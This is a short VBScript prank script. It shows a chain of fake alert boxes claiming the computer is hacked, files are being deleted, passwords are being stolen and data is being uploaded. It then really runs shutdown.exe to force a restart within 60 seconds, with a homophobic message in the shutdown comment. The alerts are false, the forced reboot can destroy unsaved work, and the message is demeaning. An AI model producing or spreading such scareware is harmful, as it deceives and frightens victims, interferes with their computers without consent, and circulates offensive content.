x=MsgBox("Error while opening Computer. Do you want to Fix this Eror?", 4+64, "Critical error")
x=MsgBox("Unable to Fix this Error. Do you want to scan this computer", 3+48, "Error")
x=MsgBox("Alert! Virus Detected. Remove Virus?", 3+16, "Alert!")
x=MsgBox("Alert! Your computer is hacked.", 2+16, "Hacked!")
x=MsgBox("Unable to remove the virus", 1+64, "Critical Error! ")
x=MsgBox("Virus is Activated", 2+16, "Alert")
x=MsgBox("Deleting the system files...", 2+16, "File Deletion")
x=MsgBox("Virus is copying your passwords...", 2+48, "Virus Alert")
x=MsgBox("Please wait, Uploading data to server. Do you want to stop it", 4+64, "File Transfer")
x=MsgBox("Error. Can not stop. File transfer completed", 1+16, "Completed")
x=MsgBox("Your computer is under my control", 0+64, "Alert")
x=MsgBox("The system will now crash!", 0+64, "LOL")

set objShell = wscript.CreateObject("wscript.shell")
objShell.Run "shutdown.exe /R /T 60 /C ""im going to reboot your computer into GAYSEX mode"" "